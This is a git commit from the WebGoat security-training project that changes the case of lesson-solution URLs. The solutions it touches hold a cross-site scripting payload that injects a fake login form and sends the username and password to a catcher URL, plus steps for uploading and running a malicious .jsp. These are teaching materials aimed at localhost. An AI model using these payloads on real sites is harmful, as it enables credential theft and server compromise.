Fixed more /webgoat versus /WebGoat issues.
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@467 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64@gmail.com
parent
f9bf8c6a27
commit
5add3e7c06
@ -36,8 +36,8 @@ Next, we need to figure out where the files are being uploaded so we can execute
|
|||||||
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
|
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
|
||||||
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
|
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
|
||||||
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
|
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
|
||||||
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
|
The URL should look something like <b>http://localhost/WebGoat/uploads/image.jpg</b>.<br/>
|
||||||
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
|
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/WebGoat/uploads/yourfile.jsp</b>.<br/><br/>
|
||||||
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
|
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@ -18,7 +18,7 @@ hard for a victim to determinate that the content is malicious.
|
|||||||
<p><b>General Goal(s):</b><br/>
|
<p><b>General Goal(s):</b><br/>
|
||||||
The user should be able to add a form asking for username
|
The user should be able to add a form asking for username
|
||||||
and password. On submit the input should be sent to
|
and password. On submit the input should be sent to
|
||||||
http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
<b>Solution:</b><br/>
|
<b>Solution:</b><br/>
|
||||||
@ -38,7 +38,7 @@ name = "pass"><br></form><br><br><HR>
|
|||||||
</p>
|
</p>
|
||||||
Now you need a script:
|
Now you need a script:
|
||||||
<p>
|
<p>
|
||||||
<script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&user="+
|
<script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
||||||
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
||||||
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
||||||
</script>
|
</script>
|
||||||
@ -53,7 +53,7 @@ calls the script. You can reach this with the onclick="myFunction()" handler:
|
|||||||
<input type="submit" name="login" value="login" onclick="hack()">
|
<input type="submit" name="login" value="login" onclick="hack()">
|
||||||
<p>
|
<p>
|
||||||
The final String looks like this:<br/>
|
The final String looks like this:<br/>
|
||||||
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&user="+
|
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
||||||
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
||||||
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
||||||
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
||||||
|
|||||||
@ -777,7 +777,7 @@ HTTP Request with WebScarab and click on the
|
|||||||
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
|
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
|
||||||
style='font-family:"Arial","sans-serif"'>Change the POST header to open
|
style='font-family:"Arial","sans-serif"'>Change the POST header to open
|
||||||
the SoapRequest: <br/>
|
the SoapRequest: <br/>
|
||||||
POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
|
POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
|
||||||
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
|
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
|
||||||
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
|
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
|
||||||
text/xml:<br/>
|
text/xml:<br/>
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user